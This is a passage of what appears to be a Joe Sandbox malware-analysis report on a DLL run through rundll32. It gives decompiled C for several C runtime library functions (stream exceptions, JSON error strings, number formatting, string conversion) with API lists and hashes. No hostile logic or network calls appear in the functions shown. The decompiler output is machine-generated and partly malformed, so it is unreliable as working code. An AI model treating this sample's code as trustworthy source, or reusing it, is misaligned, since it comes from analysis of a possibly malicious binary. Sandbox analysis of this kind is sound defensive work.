                          • _free.LIBCMT ref: 6E258B75
                            • Part of subcall function 6E258951: _free.LIBCMT ref: 6E2589A9
                            • Part of subcall function 6E258951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                            • Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                            • Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID: 0!'n
                          • API String ID: 314583886-2553279824
                          • Opcode ID: 36376658c50b6ec967853ad53bb3c4fbe693fac2c8390b4e887b44e07b7e2014
                          • Instruction ID: 2d7148b183a6b827f0dbd635795aa4ac155bef34ca229043efccfa8fcf4cf7c1
                          • Opcode Fuzzy Hash: 36376658c50b6ec967853ad53bb3c4fbe693fac2c8390b4e887b44e07b7e2014
                          • Instruction Fuzzy Hash: DF217CB6C1421D9BDB2887A8CE44DDBB37FCB81720F1006A5D455E6340DBB04D90C5A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 40%
                          			E6E1E1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6E1E1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6E1E1EBD(_t24, _t31, _t19);
						_push(0x6e2c3568);
						_push( &_v32);
					}
					E6E223D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}










                          0x6e1e1eea
                          0x6e1e1ef3
                          0x6e1e1ef6
                          0x6e1e1efd
                          0x6e1e1eff
                          0x6e1e1f47
                          0x6e1e1f01
                          0x6e1e1f05
                          0x6e1e1f4a
                          0x6e1e1f4c
                          0x6e1e1f07
                          0x6e1e1f0a
                          0x6e1e1f20
                          0x6e1e1f0c
                          0x6e1e1f0c
                          0x6e1e1f0c
                          0x6e1e1f29
                          0x6e1e1f32
                          0x6e1e1f35
                          0x6e1e1f3a
                          0x6e1e1f42
                          0x6e1e1f42
                          0x6e1e1f4e
                          0x6e1e1f53
                          0x6e1e1f57
                          0x6e1e1f57

                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1E1F4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
                          • Instruction ID: 6898c8c95af63bb64c1bd810da426ff31557d66aa9f6f58dc9a9725a31fc5930
                          • Opcode Fuzzy Hash: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
                          • Instruction Fuzzy Hash: 02F0F4B2E446192FDF54DBD8C802FDA73A96B14314F208845F951AB582EB75A889C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          C-Code - Quality: 91%
                          			E6E20407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6E2200AC(0x6e26808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6E205192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6E241D60("[json.exception."));
				E6E202D14(_t30, "[json.exception.", E6E241D60("[json.exception."));
				E6E201F57( *((intOrPtr*)(_t33 + 8)));
				return E6E220075(_t30);
			}





                          0x6e204084
                          0x6e204089
                          0x6e20408b
                          0x6e204090
                          0x6e204093
                          0x6e204096
                          0x6e20409d
                          0x6e2040a4
                          0x6e2040a8
                          0x6e2040c0
                          0x6e2040d0
                          0x6e2040d8
                          0x6e2040e4

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strlen$H_prolog3
                          • String ID: [json.exception.
                          • API String ID: 2883720156-791563284
                          • Opcode ID: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
                          • Instruction ID: ed24d3b07345910740ac1649ea3544e7153a155586584edc6b9706bbbf42f53f
                          • Opcode Fuzzy Hash: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
                          • Instruction Fuzzy Hash: 64F036B5600219AFDB189FB8C8506FEB6EFBF44708F540919E409DB281DBB45D548791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24F345, Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E24F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E231F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6E2675C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6E2675C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6E2239C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6E2675C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6E267640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6E267640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6E267640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6E24F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6E2678B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6E242281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6E24215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                          0x6e24f345
                          0x6e24f350
                          0x6e24f357
                          0x6e24f359
                          0x6e24f359
                          0x6e24f35b
                          0x6e24f364
                          0x6e24f366
                          0x6e24f36b
                          0x6e24f371
                          0x6e24f387
                          0x6e24f38c
                          0x6e24f38f
                          0x6e24f39c
                          0x6e24f3a1
                          0x6e24f3f5
                          0x6e24f3fd
                          0x6e24f3ff
                          0x6e24f401
                          0x6e24f404
                          0x6e24f404
                          0x6e24f404
                          0x6e24f40a
                          0x6e24f412
                          0x6e24f425
                          0x6e24f428
                          0x6e24f42a
                          0x6e24f42d
                          0x6e24f42e
                          0x6e24f44f
                          0x6e24f452
                          0x6e24f452
                          0x6e24f430
                          0x6e24f430
                          0x6e24f432
                          0x6e24f43d
                          0x6e24f43d
                          0x6e24f43f
                          0x6e24f446
                          0x6e24f441
                          0x6e24f441
                          0x6e24f441
                          0x6e24f43f
                          0x6e24f453
                          0x6e24f455
                          0x6e24f456
                          0x6e24f459
                          0x6e24f45b
                          0x6e24f465
                          0x6e24f46f
                          0x6e24f45d
                          0x6e24f45d
                          0x6e24f45d
                          0x6e24f474
                          0x6e24f474
                          0x6e24f479
                          0x6e24f47c
                          0x6e24f487
                          0x6e24f487
                          0x6e24f487
                          0x6e24f487
                          0x6e24f48b
                          0x6e24f492
                          0x6e24f493
                          0x6e24f496
                          0x6e24f499
                          0x6e24f499
                          0x6e24f49b
                          0x00000000
                          0x00000000
                          0x6e24f4b3
                          0x6e24f4ba
                          0x6e24f4be
                          0x6e24f4c1
                          0x6e24f4c4
                          0x6e24f4c6
                          0x6e24f4c6
                          0x6e24f4c6
                          0x6e24f4c8
                          0x6e24f4cb
                          0x6e24f4ce
                          0x6e24f4d0
                          0x6e24f4d8
                          0x6e24f4de
                          0x6e24f4e1
                          0x6e24f4e4
                          0x6e24f4e5
                          0x6e24f4e8
                          0x6e24f4eb
                          0x6e24f4eb
                          0x6e24f4f0
                          0x6e24f4f3
                          0x00000000
                          0x00000000
                          0x6e24f50b
                          0x6e24f510
                          0x6e24f514
                          0x00000000
                          0x00000000
                          0x6e24f518
                          0x6e24f51b
                          0x6e24f51c
                          0x6e24f51c
                          0x6e24f51e
                          0x6e24f521
                          0x00000000
                          0x00000000
                          0x6e24f523
                          0x6e24f526
                          0x6e24f52d
                          0x6e24f530
                          0x6e24f533
                          0x6e24f549
                          0x6e24f549
                          0x6e24f549
                          0x6e24f535
                          0x6e24f535
                          0x6e24f537
                          0x6e24f53a
                          0x6e24f545
                          0x6e24f53c
                          0x6e24f53f
                          0x6e24f53f
                          0x6e24f53a
                          0x00000000
                          0x6e24f533
                          0x6e24f528
                          0x6e24f528
                          0x6e24f52a
                          0x6e24f52a
                          0x6e24f47e
                          0x6e24f47e
                          0x6e24f481
                          0x6e24f54c
                          0x6e24f54c
                          0x6e24f54e
                          0x6e24f550
                          0x6e24f553
                          0x6e24f554
                          0x6e24f555
                          0x6e24f556
                          0x6e24f55e
                          0x6e24f55e
                          0x6e24f55e
                          0x6e24f560
                          0x6e24f563
                          0x6e24f566
                          0x6e24f568
                          0x6e24f568
                          0x6e24f56a
                          0x6e24f57c
                          0x6e24f580
                          0x6e24f583
                          0x6e24f58a
                          0x6e24f592
                          0x6e24f592
                          0x6e24f595
                          0x6e24f597
                          0x6e24f5a8
                          0x6e24f5a8
                          0x6e24f5ac
                          0x6e24f5ac
                          0x6e24f5af
                          0x6e24f5b1
                          0x6e24f5b4
                          0x00000000
                          0x6e24f599
                          0x6e24f599
                          0x6e24f59f
                          0x6e24f59f
                          0x6e24f5a3
                          0x6e24f5b6
                          0x6e24f5b6
                          0x6e24f5ba
                          0x6e24f5bb
                          0x6e24f5bd
                          0x6e24f5bf
                          0x6e24f600
                          0x6e24f600
                          0x6e24f602
                          0x6e24f60f
                          0x6e24f60f
                          0x6e24f611
                          0x6e24f613
                          0x6e24f614
                          0x6e24f615
                          0x6e24f61c
                          0x6e24f61f
                          0x6e24f621
                          0x6e24f621
                          0x6e24f622
                          0x6e24f624
                          0x6e24f627
                          0x6e24f627
                          0x6e24f629
                          0x6e24f62b
                          0x00000000
                          0x6e24f62b
                          0x6e24f604
                          0x6e24f606
                          0x00000000
                          0x00000000
                          0x6e24f608
                          0x00000000
                          0x00000000
                          0x6e24f60a
                          0x6e24f60d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f60d
                          0x6e24f5c6
                          0x6e24f5cc
                          0x6e24f5cc
                          0x6e24f5ce
                          0x6e24f5cf
                          0x6e24f5d0
                          0x6e24f5d1
                          0x6e24f5d8
                          0x6e24f5db
                          0x6e24f5dd
                          0x6e24f5de
                          0x6e24f5e0
                          0x6e24f5ed
                          0x6e24f5ed
                          0x6e24f5ef
                          0x6e24f5f1
                          0x6e24f5f2
                          0x6e24f5f3
                          0x6e24f5fa
                          0x6e24f5fd
                          0x6e24f5ff
                          0x6e24f5ff
                          0x00000000
                          0x6e24f5ff
                          0x6e24f5e2
                          0x6e24f5e2
                          0x6e24f5e4
                          0x00000000
                          0x00000000
                          0x6e24f5e6
                          0x00000000
                          0x00000000
                          0x6e24f5e8
                          0x6e24f5eb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f5eb
                          0x6e24f5c8
                          0x6e24f5ca
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f5ca
                          0x6e24f59b
                          0x6e24f59d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f59d
                          0x6e24f597
                          0x00000000
                          0x6e24f481
                          0x6e24f47c
                          0x6e24f3a3
                          0x6e24f3a5
                          0x00000000
                          0x6e24f3a7
                          0x6e24f3bd
                          0x6e24f3c2
                          0x6e24f3c4
                          0x6e24f3d0
                          0x6e24f3d6
                          0x6e24f3d7
                          0x6e24f3d9
                          0x6e24f3db
                          0x6e24f3e6
                          0x6e24f3e6
                          0x6e24f3e9
                          0x6e24f3eb
                          0x6e24f3eb
                          0x6e24f3ee
                          0x6e24f3c6
                          0x6e24f3c6
                          0x6e24f3c6
                          0x00000000
                          0x6e24f3c4
                          0x6e24f373
                          0x6e24f373
                          0x6e24f37a
                          0x6e24f37b
                          0x6e24f37d
                          0x6e24f62f
                          0x6e24f633
                          0x6e24f638
                          0x6e24f638
                          0x6e24f647
                          0x6e24f647

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
                          • Instruction ID: 07e65a92fcb1d6d644c436182b844975bdb8764f7259a11deebbd27491fcd912
                          • Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
                          • Instruction Fuzzy Hash: 3EA1557691428FDFF719CFA8C890BABBBE6EF85314F2442ADD5949B280C7348941CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E256102, Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E6E256102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t34 ^ _t69;
				E6E231F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6E21F8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6E2239C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6E20DEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6E24F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6E2201B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                          0x6e256102
                          0x6e25610a
                          0x6e256111
                          0x6e25611d
                          0x6e256122
                          0x6e256127
                          0x6e25612c
                          0x6e25612c
                          0x6e25612f
                          0x6e256131
                          0x6e256131
                          0x6e256136
                          0x6e25614f
                          0x6e256155
                          0x6e25615a
                          0x6e2561f9
                          0x6e2561fd
                          0x6e256202
                          0x6e256202
                          0x6e25621e
                          0x6e25621e
                          0x6e256160
                          0x6e256163
                          0x6e256168
                          0x6e25616c
                          0x6e2561b8
                          0x6e2561ba
                          0x6e2561bc
                          0x6e2561c1
                          0x6e2561d8
                          0x6e2561e0
                          0x6e2561f0
                          0x6e2561f0
                          0x6e2561e0
                          0x6e2561f2
                          0x6e2561f3
                          0x00000000
                          0x6e2561f8
                          0x6e25616e
                          0x6e256173
                          0x6e256175
                          0x6e256177
                          0x6e256177
                          0x6e25617f
                          0x6e25619c
                          0x6e2561a6
                          0x6e2561ab
                          0x00000000
                          0x00000000
                          0x6e2561ad
                          0x6e2561b3
                          0x6e2561b3
                          0x00000000
                          0x6e2561b3
                          0x6e256183
                          0x6e256187
                          0x6e25618c
                          0x6e256190
                          0x00000000
                          0x00000000
                          0x6e256192
                          0x00000000

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E270EA8,00000000,00000000,008B018B,6E24DA1E,?,00000004,00000001,6E270EA8,0000007F,?,008B018B,00000001), ref: 6E25614F
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2561D8
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2561EA
                          • __freea.LIBCMT ref: 6E2561F3
                            • Part of subcall function 6E24F26D: HeapAlloc.KERNEL32(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                          • String ID:
                          • API String ID: 573072132-0
                          • Opcode ID: 31adc786002af90fd0afe0ccc324b9f1a289f0faed92b3242dd8830691467301
                          • Instruction ID: 24040bab084808e666568400936d7155eeaf8ac9e81db9348fa2041b39c9d7f1
                          • Opcode Fuzzy Hash: 31adc786002af90fd0afe0ccc324b9f1a289f0faed92b3242dd8830691467301
                          • Instruction Fuzzy Hash: 6B31BF71A1021F9FDF148FA4CC84DBE7BA6EB40614F188568EC14DA351EB35C960CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E253E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 95%
